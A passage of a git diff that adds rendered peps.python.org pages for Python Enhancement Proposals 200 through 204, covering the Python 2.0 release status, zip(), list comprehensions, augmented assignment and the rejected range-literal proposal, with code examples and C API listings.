+---------         --------    -------------
+test_mmap         Win ME      03-Sep-2000       Windows 2b1p2 prelease
+    [04-Sep-2000 tim
+     reported by Audun S. Runde mailto:audun@mindspring.com
+     the mmap constructor fails w/
+        WindowsError: [Errno 6] The handle is invalid
+     since there are no reports of this failing on other
+     flavors of Windows, this looks like to be an ME bug
+    ]
+
+
+
+
+

Open items – Need to be resolved before 2.0 final release

+

Decide whether cycle-gc should be enabled by default.

+

Resolve compatibility issues between core xml package and the XML-SIG +XML package.

+

Update Tools/compiler so that it is compatible with list +comprehensions, import as, and any other new language features.

+

Improve code coverage of test suite.

+

Finish writing the PEPs for the features that went out with 2.0b1(! +sad, but realistic – we’ll get better with practice).

+

Major effort to whittle the bug database down to size. I’ve (tim) +seen this before: if you can keep all the open bugs fitting on one +screen, people will generally keep it that way. But let it slobber +over a screen for a month, & it just goes to hell (no “visible +progress” indeed!).

+
+
+

Accepted and in progress

+
    +
  • Currently none left. [4-Sep-2000 guido]
  • +
+
+
+

Open: proposed but not accepted or rejected

+
    +
  • There are a number of open patches again. We need to clear these +out soon.
  • +
+
+
+

Previously failing test cases

+

If you find a test bouncing between this section and the previous one, +the code it’s testing is in trouble!

+
test case         platform    date reported
+---------         --------    -------------
+test_fork1        Linux       26-Jul-2000
+    [28-aug-2000 fixed by cgw; solution is to create copies of
+    lock in child process]
+    [19-Aug-2000 tim
+     Charles Waldman whipped up a patch to give child processes a new
+     "global lock":
+     http://sourceforge.net/patch/?func=detailpatch&patch_id=101226&group_id=5470
+     While this doesn't appear to address the symptoms we *saw*, it
+     *does* so far appear to be fixing the failing cases anyway
+    ]
+
+test_parser       all         22-Aug-2000
+test_posixpath    all         22-Aug-2000
+
+test_popen2       Win32       26-Jul-2000
+    [31-Aug-2000 tim
+     This died again, but for an entirely different reason:  it uses a
+     dict to map file pointers to process handles, and calls a dict
+     access function during popen.close().  But .close releases threads,
+     which left the internal popen code accessing the dict without a
+     valid thread state.  The dict implementation changed so that's no
+     longer accepted.  Fixed by creating a temporary thread state in the
+     guts of popen's close routine, and grabbing the global lock with
+     it for the duration]
+    [20-Aug-2000 tim
+     changed the popen2.py _test function to use the "more" cmd
+     when os.name == "nt".  This makes test_popen2 pass under
+     Win98SE.
+     HOWEVER, the Win98 "more" invents a leading newline out
+     of thin air, and I'm not sure that the other Windows flavors
+     of "more" also do that.
+     So, somebody please try under other Windows flavors!
+    ]
+    [still fails 15-Aug-2000 for me, on Win98 - tim
+         test test_popen2 crashed -- exceptions.AssertionError :
+     The problem is that the test uses "cat", but there is
+     no such thing under Windows (unless you install it).
+     So it's the test that's broken here, not (necessarily)
+     the code.
+    ]
+
+test_winreg        Win32      26-Jul-2000
+    [works 15-Aug-2000 for me, on Win98 - tim]
+
+test_mmap          Win32      26-Jul-2000
+    [believe that was fixed by Mark H.]
+    [works 15-Aug-2000 for me, on Win98 - tim]
+
+test_longexp      Win98+?     15-Aug-2000
+    [fails in release build,
+     passes in release build under verbose mode but doesn't
+         look like it should pass,
+     passes in debug build,
+     passes in debug build under verbose mode and looks like
+         it should pass
+    ]
+    [18-Aug-2000, tim:  can't reproduce, and nobody else
+     saw it.  I believe there *is* a subtle bug in
+     regrtest.py when using -v, and I'll pursue that,
+     but can't provoke anything wrong with test_longexp
+     anymore; eyeballing Fred's changes didn't turn up
+     a suspect either
+     19-Aug-2000, tim: the "subtle bug" in regrtest.py -v is
+     actually a feature:  -v masks *some* kinds of failures,
+     since it doesn't compare test output with the canned
+     output; this is what makes it say "test passed" even
+     in some cases where the test fails without -v
+    ]
+
+test_winreg2      Win32       26-Jul-2000
+    [20-Aug-2000 tim - the test has been removed from the project]
+    [19-Aug-2000 tim
+     This test will never work on Win98, because it's looking for
+     a part of registry that doesn't exist under W98.
+     The module (winreg.py) and this test case will be removed
+     before 2.0 for other reasons, though.
+    ]
+    [still fails 15-Aug-2000 for me, on Win98 - tim
+     test test_winreg2 failed -- Writing: 'Test Failed: testHives',
+     expected: 'HKEY_PERFORMANCE_DATA\012'
+    ]
+
+
+
+
+

Open items – completed/fixed

+
[4-Sep-2000 guido: Fredrik finished this on 1-Sep]
+* PyErr_Format - Fredrik Lundh
+  Make this function safe from buffer overflows.
+
+[4-Sep-2000 guido: Fred has added popen2, popen3 on 28-Sep]
+Add popen2 support for Linux -- Fred Drake
+
+[4-Sep-2000 guido: done on 1-Sep]
+Deal with buffering problem with SocketServer
+
+[04-Sep-2000 tim:  done; installer runs; w9xpopen not an issue]
+[01-Sep-2000 tim:  make a prerelease available]
+Windows ME:  Don't know anything about it.  Will the installer
+even run?  Does it need the w9xpopen hack?
+
+[04-Sep-2000 tim:  done; tested on several Windows flavors now]
+[01-Sep-2000 tim:  completed but untested except on Win98SE]
+Windows installer:  If HKLM isn't writable, back off to HKCU (so
+Python can be installed on NT & 2000 without admin privileges).
+
+[01-Sep-200 tim - as Guido said, runtime code in posixmodule.c doesn't
+ call this on NT/2000, so no need to avoid installing it everywhere.
+ Added code to the installer *to* install it, though.]
+Windows installer:  Install w9xpopen.exe only under Win95/98.
+
+[23-Aug-2000 jeremy - tim reports "completed recently"]
+Windows:  Look for registry info in HKCU before HKLM - Mark
+Hammond.
+
+[20-Aug-2000 tim - done]
+Remove winreg.py and test_winreg2.py.  Paul Prescod (the author)
+now wants to make a registry API more like the MS .NET API.  Unclear
+whether that can be done in time for 2.0, but, regardless, if we
+let winreg.py out the door we'll be stuck with it forever, and not
+even Paul wants it anymore.
+
+[24-Aug-2000 tim+guido - done]
+Win98 Guido:  popen is hanging on Guido, and even freezing the
+whole machine.  Was caused by Norton Antivirus 2000 (6.10.20) on
+Windows 9x.  Resolution: disable virus protection.
+
+
+
+
+

Accepted and completed

+
    +
  • Change meaning of x escapes - PEP 223 - Fredrik Lundh
  • +
  • Add U1234678 escapes in u”” strings - Fredrik Lundh
  • +
  • Support for opcode arguments > 2**16 - Charles Waldman SF Patch +100893
  • +
  • “import as” - Thomas Wouters Extend the ‘import’ and ‘from … +import’ mechanism to enable importing a symbol as another name. +(Without adding a new keyword.)
  • +
  • List comprehensions - Skip Montanaro Tim Peters still needs to do +PEP.
  • +
  • Restore old os.path.commonprefix behavior Do we have test cases that +work on all platforms?
  • +
  • Tim O’Malley’s cookie module with good license
  • +
  • Lockstep iteration (“zip” function) - Barry Warsaw
  • +
  • SRE - Fredrik Lundh [at least I think it’s done, as of +15-Aug-2000 - tim]
  • +
  • Fix xrange printing behavior - Fred Drake Remove the tp_print +handler for the xrange type; it produced a list display instead of +‘xrange(…)’. The new code produces a minimal call to xrange(), +enclosed in (... * N) when N != 1. This makes the repr() more +human readable while making it do what reprs are advertised as +doing. It also makes the xrange objects obvious when working in the +interactive interpreter.
  • +
  • Extended print statement - Barry Warsaw PEP 214 +SF Patch #100970 +http://sourceforge.net/patch/?func=detailpatch&patch_id=100970&group_id=5470
  • +
  • interface to poll system call - Andrew Kuchling SF Patch 100852
  • +
  • Augmented assignment - Thomas Wouters Add += and family, plus Python +and C hooks, and API functions.
  • +
  • gettext.py module - Barry Warsaw
  • +
+
+
+

Postponed

+
    +
  • Extended slicing on lists - Michael Hudson Make lists (and other +builtin types) handle extended slices.
  • +
  • Compression of Unicode database - Fredrik Lundh SF Patch 100899 At +least for 2.0b1. May be included in 2.0 as a bug fix.
  • +
  • Range literals - Thomas Wouters SF Patch 100902 We ended up having a +lot of doubt about the proposal.
  • +
  • Eliminated SET_LINENO opcode - Vladimir Marangozov Small +optimization achieved by using the code object’s lnotab instead of +the SET_LINENO instruction. Uses code rewriting technique (that +Guido’s frowns on) to support debugger, which uses SET_LINENO.

    http://starship.python.net/~vlad/lineno/ for (working at the time) +patches

    +

    Discussions on python-dev:

    + +
  • +
  • test harness for C code - Trent Mick
  • +
+
+
+

Rejected

+
    +
  • ‘indexing-for’ - Thomas Wouters Special syntax to give Python code +access to the loop-counter in ‘for’ loops. (Without adding a new +keyword.)
  • +
+
+
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0200.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0201/index.html b/pep-0201/index.html new file mode 100644 index 00000000000..772c4107482 --- /dev/null +++ b/pep-0201/index.html @@ -0,0 +1,400 @@ + + + + + + + + PEP 201 – Lockstep Iteration | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 201 – Lockstep Iteration

+
+
Author:
+
Barry Warsaw <barry at python.org>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
13-Jul-2000
+
Python-Version:
+
2.0
+
Post-History:
+
27-Jul-2000
+
+
+
+
Table of Contents +
+
+

Introduction

+

This PEP describes the ‘lockstep iteration’ proposal. This PEP tracks +the status and ownership of this feature, slated for introduction in +Python 2.0. It contains a description of the feature and outlines +changes necessary to support the feature. This PEP summarizes +discussions held in mailing list forums, and provides URLs for further +information, where appropriate. The CVS revision history of this file +contains the definitive historical record.

+
+
+

Motivation

+

Standard for-loops in Python iterate over every element in a sequence +until the sequence is exhausted [1]. However, for-loops iterate over +only a single sequence, and it is often desirable to loop over more +than one sequence in a lock-step fashion. In other words, in a way +such that the i-th iteration through the loop returns an object +containing the i-th element from each sequence.

+

The common idioms used to accomplish this are unintuitive. This PEP +proposes a standard way of performing such iterations by introducing a +new builtin function called zip.

+

While the primary motivation for zip() comes from lock-step iteration, +by implementing zip() as a built-in function, it has additional +utility in contexts other than for-loops.

+
+
+

Lockstep For-Loops

+

Lockstep for-loops are non-nested iterations over two or more +sequences, such that at each pass through the loop, one element from +each sequence is taken to compose the target. This behavior can +already be accomplished in Python through the use of the map() built-in +function:

+
>>> a = (1, 2, 3)
+>>> b = (4, 5, 6)
+>>> for i in map(None, a, b): print i
+...
+(1, 4)
+(2, 5)
+(3, 6)
+>>> map(None, a, b)
+[(1, 4), (2, 5), (3, 6)]
+
+
+

The for-loop simply iterates over this list as normal.

+

While the map() idiom is a common one in Python, it has several +disadvantages:

+
    +
  • It is non-obvious to programmers without a functional programming +background.
  • +
  • The use of the magic None first argument is non-obvious.
  • +
  • It has arbitrary, often unintended, and inflexible semantics when +the lists are not of the same length: the shorter sequences are +padded with None:
    >>> c = (4, 5, 6, 7)
    +>>> map(None, a, c)
    +[(1, 4), (2, 5), (3, 6), (None, 7)]
    +
    +
    +
  • +
+

For these reasons, several proposals were floated in the Python 2.0 +beta time frame for syntactic support of lockstep for-loops. Here are +two suggestions:

+
for x in seq1, y in seq2:
+  # stuff
+
+
+
for x, y in seq1, seq2:
+  # stuff
+
+
+

Neither of these forms would work, since they both already mean +something in Python and changing the meanings would break existing +code. All other suggestions for new syntax suffered the same problem, +or were in conflict with other another proposed feature called ‘list +comprehensions’ (see PEP 202).

+
+
+

The Proposed Solution

+

The proposed solution is to introduce a new built-in sequence +generator function, available in the __builtin__ module. This +function is to be called zip and has the following signature:

+
zip(seqa, [seqb, [...]])
+
+
+

zip() takes one or more sequences and weaves their elements +together, just as map(None, ...) does with sequences of equal +length. The weaving stops when the shortest sequence is exhausted.

+
+
+

Return Value

+

zip() returns a real Python list, the same way map() does.

+
+
+

Examples

+

Here are some examples, based on the reference implementation below:

+
>>> a = (1, 2, 3, 4)
+>>> b = (5, 6, 7, 8)
+>>> c = (9, 10, 11)
+>>> d = (12, 13)
+
+>>> zip(a, b)
+[(1, 5), (2, 6), (3, 7), (4, 8)]
+
+>>> zip(a, d)
+[(1, 12), (2, 13)]
+
+>>> zip(a, b, c, d)
+[(1, 5, 9, 12), (2, 6, 10, 13)]
+
+
+

Note that when the sequences are of the same length, zip() is +reversible:

+
>>> a = (1, 2, 3)
+>>> b = (4, 5, 6)
+>>> x = zip(a, b)
+>>> y = zip(*x) # alternatively, apply(zip, x)
+>>> z = zip(*y) # alternatively, apply(zip, y)
+>>> x
+[(1, 4), (2, 5), (3, 6)]
+>>> y
+[(1, 2, 3), (4, 5, 6)]
+>>> z
+[(1, 4), (2, 5), (3, 6)]
+>>> x == z
+1
+
+
+

It is not possible to reverse zip this way when the sequences are not +all the same length.

+
+
+

Reference Implementation

+

Here is a reference implementation, in Python of the zip() built-in +function. This will be replaced with a C implementation after final +approval:

+
def zip(*args):
+    if not args:
+        raise TypeError('zip() expects one or more sequence arguments')
+    ret = []
+    i = 0
+    try:
+        while 1:
+            item = []
+            for s in args:
+                item.append(s[i])
+            ret.append(tuple(item))
+            i = i + 1
+    except IndexError:
+        return ret
+
+
+
+
+

BDFL Pronouncements

+

Note: the BDFL refers to Guido van Rossum, Python’s Benevolent +Dictator For Life.

+
    +
  • The function’s name. An earlier version of this PEP included an +open issue listing 20+ proposed alternative names to zip(). In +the face of no overwhelmingly better choice, the BDFL strongly +prefers zip() due to its Haskell [2] heritage. See version 1.7 +of this PEP for the list of alternatives.
  • +
  • zip() shall be a built-in function.
  • +
  • Optional padding. An earlier version of this PEP proposed an +optional pad keyword argument, which would be used when the +argument sequences were not the same length. This is similar +behavior to the map(None, ...) semantics except that the user +would be able to specify pad object. This has been rejected by the +BDFL in favor of always truncating to the shortest sequence, because +of the KISS principle. If there’s a true need, it is easier to add +later. If it is not needed, it would still be impossible to delete +it in the future.
  • +
  • Lazy evaluation. An earlier version of this PEP proposed that +zip() return a built-in object that performed lazy evaluation +using __getitem__() protocol. This has been strongly rejected +by the BDFL in favor of returning a real Python list. If lazy +evaluation is desired in the future, the BDFL suggests an xzip() +function be added.
  • +
  • zip() with no arguments. the BDFL strongly prefers this raise a +TypeError exception.
  • +
  • zip() with one argument. the BDFL strongly prefers that this +return a list of 1-tuples.
  • +
  • Inner and outer container control. An earlier version of this PEP +contains a rather lengthy discussion on a feature that some people +wanted, namely the ability to control what the inner and outer +container types were (they are tuples and list respectively in this +version of the PEP). Given the simplified API and implementation, +this elaboration is rejected. For a more detailed analysis, see +version 1.7 of this PEP.
  • +
+
+
+

Subsequent Change to zip()

+

In Python 2.4, zip() with no arguments was modified to return an empty +list rather than raising a TypeError exception. The rationale for the +original behavior was that the absence of arguments was thought to +indicate a programming error. However, that thinking did not +anticipate the use of zip() with the * operator for unpacking +variable length argument lists. For example, the inverse of zip could +be defined as: unzip = lambda s: zip(*s). That transformation +also defines a matrix transpose or an equivalent row/column swap for +tables defined as lists of tuples. The latter transformation is +commonly used when reading data files with records as rows and fields +as columns. For example, the code:

+
date, rain, high, low = zip(*csv.reader(file("weather.csv")))
+
+
+

rearranges columnar data so that each field is collected into +individual tuples for straightforward looping and summarization:

+
print "Total rainfall", sum(rain)
+
+
+

Using zip(*args) is more easily coded if zip(*[]) is handled +as an allowable case rather than an exception. This is especially +helpful when data is either built up from or recursed down to a null +case with no records.

+

Seeing this possibility, the BDFL agreed (with some misgivings) to +have the behavior changed for Py2.4.

+
+
+

Other Changes

+
    +
  • The xzip() function discussed above was implemented in Py2.3 in +the itertools module as itertools.izip(). This function +provides lazy behavior, consuming single elements and producing a +single tuple on each pass. The “just-in-time” style saves memory +and runs faster than its list based counterpart, zip().
  • +
  • The itertools module also added itertools.repeat() and +itertools.chain(). These tools can be used together to pad +sequences with None (to match the behavior of map(None, +seqn)):
    zip(firstseq, chain(secondseq, repeat(None)))
    +
    +
    +
  • +
+
+
+

References

+ +

Greg Wilson’s questionnaire on proposed syntax to some CS grad students +http://www.python.org/pipermail/python-dev/2000-July/013139.html

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0201.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0202/index.html b/pep-0202/index.html new file mode 100644 index 00000000000..34e1056d4d7 --- /dev/null +++ b/pep-0202/index.html @@ -0,0 +1,203 @@ + + + + + + + + PEP 202 – List Comprehensions | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 202 – List Comprehensions

+
+
Author:
+
Barry Warsaw <barry at python.org>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
13-Jul-2000
+
Python-Version:
+
2.0
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Introduction

+

This PEP describes a proposed syntactical extension to Python, list +comprehensions.

+
+
+

The Proposed Solution

+

It is proposed to allow conditional construction of list literals using for and +if clauses. They would nest in the same way for loops and if statements nest +now.

+
+
+

Rationale

+

List comprehensions provide a more concise way to create lists in situations +where map() and filter() and/or nested loops would currently be used.

+
+
+

Examples

+
>>> print [i for i in range(10)]
+[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
+
+>>> print [i for i in range(20) if i%2 == 0]
+[0, 2, 4, 6, 8, 10, 12, 14, 16, 18]
+
+>>> nums = [1, 2, 3, 4]
+>>> fruit = ["Apples", "Peaches", "Pears", "Bananas"]
+>>> print [(i, f) for i in nums for f in fruit]
+[(1, 'Apples'), (1, 'Peaches'), (1, 'Pears'), (1, 'Bananas'),
+ (2, 'Apples'), (2, 'Peaches'), (2, 'Pears'), (2, 'Bananas'),
+ (3, 'Apples'), (3, 'Peaches'), (3, 'Pears'), (3, 'Bananas'),
+ (4, 'Apples'), (4, 'Peaches'), (4, 'Pears'), (4, 'Bananas')]
+>>> print [(i, f) for i in nums for f in fruit if f[0] == "P"]
+[(1, 'Peaches'), (1, 'Pears'),
+ (2, 'Peaches'), (2, 'Pears'),
+ (3, 'Peaches'), (3, 'Pears'),
+ (4, 'Peaches'), (4, 'Pears')]
+>>> print [(i, f) for i in nums for f in fruit if f[0] == "P" if i%2 == 1]
+[(1, 'Peaches'), (1, 'Pears'), (3, 'Peaches'), (3, 'Pears')]
+>>> print [i for i in zip(nums, fruit) if i[0]%2==0]
+[(2, 'Peaches'), (4, 'Bananas')]
+
+
+
+
+

Reference Implementation

+

List comprehensions become part of the Python language with release 2.0, +documented in [1].

+
+
+

BDFL Pronouncements

+
    +
  • The syntax proposed above is the Right One.
  • +
  • The form [x, y for ...] is disallowed; one is required to write +[(x, y) for ...].
  • +
  • The form [... for x... for y...] nests, with the last index +varying fastest, just like nested for loops.
  • +
+
+
+

References

+ +
+
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0202.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0203/index.html b/pep-0203/index.html new file mode 100644 index 00000000000..123fc3de96a --- /dev/null +++ b/pep-0203/index.html @@ -0,0 +1,421 @@ + + + + + + + + PEP 203 – Augmented Assignments | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 203 – Augmented Assignments

+
+
Author:
+
Thomas Wouters <thomas at python.org>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
13-Jul-2000
+
Python-Version:
+
2.0
+
Post-History:
+
14-Aug-2000
+
+
+
+
Table of Contents +
+
+

Introduction

+

This PEP describes the augmented assignment proposal for Python 2.0. This +PEP tracks the status and ownership of this feature, slated for introduction +in Python 2.0. It contains a description of the feature and outlines changes +necessary to support the feature. This PEP summarizes discussions held in +mailing list forums [1], and provides URLs for further information where +appropriate. The CVS revision history of this file contains the definitive +historical record.

+
+
+

Proposed Semantics

+

The proposed patch that adds augmented assignment to Python introduces the +following new operators:

+
+= -= *= /= %= **= <<= >>= &= ^= |=
+
+
+

They implement the same operator as their normal binary form, except that the +operation is done in-place when the left-hand side object supports it, and +that the left-hand side is only evaluated once.

+

They truly behave as augmented assignment, in that they perform all of the +normal load and store operations, in addition to the binary operation they are +intended to do. So, given the expression:

+
x += y
+
+
+

The object x is loaded, then y is added to it, and the resulting +object is stored back in the original place. The precise action performed on +the two arguments depends on the type of x, and possibly of y.

+

The idea behind augmented assignment in Python is that it isn’t just an easier +way to write the common practice of storing the result of a binary operation +in its left-hand operand, but also a way for the left-hand operand in question +to know that it should operate on itself, rather than creating a modified +copy of itself.

+

To make this possible, a number of new hooks are added to Python classes and +C extension types, which are called when the object in question is used as the +left hand side of an augmented assignment operation. If the class or type +does not implement the in-place hooks, the normal hooks for the particular +binary operation are used.

+

So, given an instance object x, the expression:

+
x += y
+
+
+

tries to call x.__iadd__(y), which is the in-place variant of +__add__ . If __iadd__ is not present, x.__add__(y) is attempted, +and finally y.__radd__(x) if __add__ is missing too. There is no +right-hand-side variant of __iadd__, because that would require for +y to know how to in-place modify x, which is unsafe to say the least. +The __iadd__ hook should behave similar to __add__, returning the +result of the operation (which could be self) which is to be assigned to +the variable x.

+

For C extension types, the hooks are members of the PyNumberMethods and +PySequenceMethods structures. Some special semantics apply to make the +use of these methods, and the mixing of Python instance objects and C types, +as unsurprising as possible.

+

In the generic case of x <augop> y (or a similar case using the +PyNumber_InPlace API functions) the principal object being operated on is +x. This differs from normal binary operations, where x and y +could be considered co-operating, because unlike in binary operations, the +operands in an in-place operation cannot be swapped. However, in-place +operations do fall back to normal binary operations when in-place modification +is not supported, resulting in the following rules:

+
    +
  • If the left-hand object (x) is an instance object, and it has a +__coerce__ method, call that function with y as the argument. If +coercion succeeds, and the resulting left-hand object is a different object +than x, stop processing it as in-place and call the appropriate function +for the normal binary operation, with the coerced x and y as +arguments. The result of the operation is whatever that function returns.

    If coercion does not yield a different object for x, or x does not +define a __coerce__ method, and x has the appropriate __ihook__ +for this operation, call that method with y as the argument, and the +result of the operation is whatever that method returns.

    +
  • +
  • Otherwise, if the left-hand object is not an instance object, but its type +does define the in-place function for this operation, call that function +with x and y as the arguments, and the result of the operation is +whatever that function returns.

    Note that no coercion on either x or y is done in this case, and +it’s perfectly valid for a C type to receive an instance object as the +second argument; that is something that cannot happen with normal binary +operations.

    +
  • +
  • Otherwise, process it exactly as a normal binary operation (not in-place), +including argument coercion. In short, if either argument is an instance +object, resolve the operation through __coerce__, __hook__ and +__rhook__. Otherwise, both objects are C types, and they are coerced +and passed to the appropriate function.
  • +
  • If no way to process the operation can be found, raise a TypeError with +an error message specific to the operation.
  • +
  • Some special casing exists to account for the case of + and *, +which have a special meaning for sequences: for +, sequence +concatenation, no coercion what so ever is done if a C type defines +sq_concat or sq_inplace_concat. For *, sequence repeating, +y is converted to a C integer before calling either +sq_inplace_repeat and sq_repeat. This is done even if y is an +instance, though not if x is an instance.
  • +
+

The in-place function should always return a new reference, either to the +old x object if the operation was indeed performed in-place, or to a new +object.

+
+
+

Rationale

+

There are two main reasons for adding this feature to Python: simplicity of +expression, and support for in-place operations. The end result is a tradeoff +between simplicity of syntax and simplicity of expression; like most new +features, augmented assignment doesn’t add anything that was previously +impossible. It merely makes these things easier to do.

+

Adding augmented assignment will make Python’s syntax more complex. Instead +of a single assignment operation, there are now twelve assignment operations, +eleven of which also perform a binary operation. However, these eleven new +forms of assignment are easy to understand as the coupling between assignment +and the binary operation, and they require no large conceptual leap to +understand. Furthermore, languages that do have augmented assignment have +shown that they are a popular, much used feature. Expressions of the form:

+
<x> = <x> <operator> <y>
+
+
+

are common enough in those languages to make the extra syntax worthwhile, and +Python does not have significantly fewer of those expressions. Quite the +opposite, in fact, since in Python you can also concatenate lists with a +binary operator, something that is done quite frequently. Writing the above +expression as:

+
<x> <operator>= <y>
+
+
+

is both more readable and less error prone, because it is instantly obvious to +the reader that it is <x> that is being changed, and not <x> that is +being replaced by something almost, but not quite, entirely unlike <x>.

+

The new in-place operations are especially useful to matrix calculation and +other applications that require large objects. In order to efficiently deal +with the available program memory, such packages cannot blindly use the +current binary operations. Because these operations always create a new +object, adding a single item to an existing (large) object would result in +copying the entire object (which may cause the application to run out of +memory), add the single item, and then possibly delete the original object, +depending on reference count.

+

To work around this problem, the packages currently have to use methods or +functions to modify an object in-place, which is definitely less readable than +an augmented assignment expression. Augmented assignment won’t solve all the +problems for these packages, since some operations cannot be expressed in the +limited set of binary operators to start with, but it is a start. PEP 211 +is looking at adding new operators.

+
+
+

New methods

+

The proposed implementation adds the following 11 possible hooks which +Python classes can implement to overload the augmented assignment operations:

+
__iadd__
+__isub__
+__imul__
+__idiv__
+__imod__
+__ipow__
+__ilshift__
+__irshift__
+__iand__
+__ixor__
+__ior__
+
+
+

The i in __iadd__ stands for in-place.

+

For C extension types, the following struct members are added.

+

To PyNumberMethods:

+
binaryfunc nb_inplace_add;
+binaryfunc nb_inplace_subtract;
+binaryfunc nb_inplace_multiply;
+binaryfunc nb_inplace_divide;
+binaryfunc nb_inplace_remainder;
+binaryfunc nb_inplace_power;
+binaryfunc nb_inplace_lshift;
+binaryfunc nb_inplace_rshift;
+binaryfunc nb_inplace_and;
+binaryfunc nb_inplace_xor;
+binaryfunc nb_inplace_or;
+
+
+

To PySequenceMethods:

+
binaryfunc sq_inplace_concat;
+intargfunc sq_inplace_repeat;
+
+
+

In order to keep binary compatibility, the tp_flags TypeObject member is +used to determine whether the TypeObject in question has allocated room for +these slots. Until a clean break in binary compatibility is made (which may +or may not happen before 2.0) code that wants to use one of the new struct +members must first check that they are available with the +PyType_HasFeature() macro:

+
if (PyType_HasFeature(x->ob_type, Py_TPFLAGS_HAVE_INPLACE_OPS) &&
+    x->ob_type->tp_as_number && x->ob_type->tp_as_number->nb_inplace_add) {
+        /* ... */
+
+
+

This check must be made even before testing the method slots for NULL +values! The macro only tests whether the slots are available, not whether +they are filled with methods or not.

+
+
+

Implementation

+

The current implementation of augmented assignment [2] adds, in addition to +the methods and slots already covered, 13 new bytecodes and 13 new API +functions.

+

The API functions are simply in-place versions of the current binary-operation +API functions:

+
PyNumber_InPlaceAdd(PyObject *o1, PyObject *o2);
+PyNumber_InPlaceSubtract(PyObject *o1, PyObject *o2);
+PyNumber_InPlaceMultiply(PyObject *o1, PyObject *o2);
+PyNumber_InPlaceDivide(PyObject *o1, PyObject *o2);
+PyNumber_InPlaceRemainder(PyObject *o1, PyObject *o2);
+PyNumber_InPlacePower(PyObject *o1, PyObject *o2);
+PyNumber_InPlaceLshift(PyObject *o1, PyObject *o2);
+PyNumber_InPlaceRshift(PyObject *o1, PyObject *o2);
+PyNumber_InPlaceAnd(PyObject *o1, PyObject *o2);
+PyNumber_InPlaceXor(PyObject *o1, PyObject *o2);
+PyNumber_InPlaceOr(PyObject *o1, PyObject *o2);
+PySequence_InPlaceConcat(PyObject *o1, PyObject *o2);
+PySequence_InPlaceRepeat(PyObject *o, int count);
+
+
+

They call either the Python class hooks (if either of the objects is a Python +class instance) or the C type’s number or sequence methods.

+

The new bytecodes are:

+
INPLACE_ADD
+INPLACE_SUBTRACT
+INPLACE_MULTIPLY
+INPLACE_DIVIDE
+INPLACE_REMAINDER
+INPLACE_POWER
+INPLACE_LEFTSHIFT
+INPLACE_RIGHTSHIFT
+INPLACE_AND
+INPLACE_XOR
+INPLACE_OR
+ROT_FOUR
+DUP_TOPX
+
+
+

The INPLACE_* bytecodes mirror the BINARY_* bytecodes, except that +they are implemented as calls to the InPlace API functions. The other two +bytecodes are utility bytecodes: ROT_FOUR behaves like ROT_THREE +except that the four topmost stack items are rotated.

+

DUP_TOPX is a bytecode that takes a single argument, which should be an +integer between 1 and 5 (inclusive) which is the number of items to duplicate +in one block. Given a stack like this (where the right side of the list is +the top of the stack):

+
[1, 2, 3, 4, 5]
+
+
+

DUP_TOPX 3 would duplicate the top 3 items, resulting in this stack:

+
[1, 2, 3, 4, 5, 3, 4, 5]
+
+
+

DUP_TOPX with an argument of 1 is the same as DUP_TOP. The limit of 5 +is purely an implementation limit . The implementation of augmented +assignment requires only DUP_TOPX with an argument of 2 and 3, and could +do without this new opcode at the cost of a fair number of DUP_TOP and +ROT_*.

+
+
+

Open Issues

+

The PyNumber_InPlace API is only a subset of the normal PyNumber API: +only those functions that are required to support the augmented assignment +syntax are included. If other in-place API functions are needed, they can be +added later.

+

The DUP_TOPX bytecode is a conveniency bytecode, and is not actually +necessary. It should be considered whether this bytecode is worth having. +There seems to be no other possible use for this bytecode at this time.

+
+ +
+

References

+ +
+
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0203.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0204/index.html b/pep-0204/index.html new file mode 100644 index 00000000000..61f4679c006 --- /dev/null +++ b/pep-0204/index.html @@ -0,0 +1,402 @@ + + + + + + + + PEP 204 – Range Literals | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 204 – Range Literals

+
+
Author:
+
Thomas Wouters <thomas at python.org>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
14-Jul-2000
+
Python-Version:
+
2.0
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Warning

+

This PEP has been rejected.

+

×

+

After careful consideration, and a period of meditation, this +proposal has been rejected. The open issues, as well as some +confusion between ranges and slice syntax, raised enough questions +for Guido not to accept it for Python 2.0, and later to reject the +proposal altogether. The new syntax and its intentions were deemed +not obvious enough.

+

[ TBD: Guido, amend/confirm this, please. Preferably both; this +is a PEP, it should contain all the reasons for rejection +and/or reconsideration, for future reference. ]

+

+
+
+

Introduction

+

This PEP describes the “range literal” proposal for Python 2.0. +This PEP tracks the status and ownership of this feature, slated +for introduction in Python 2.0. It contains a description of the +feature and outlines changes necessary to support the feature. +This PEP summarizes discussions held in mailing list forums, and +provides URLs for further information, where appropriate. The CVS +revision history of this file contains the definitive historical +record.

+
+
+

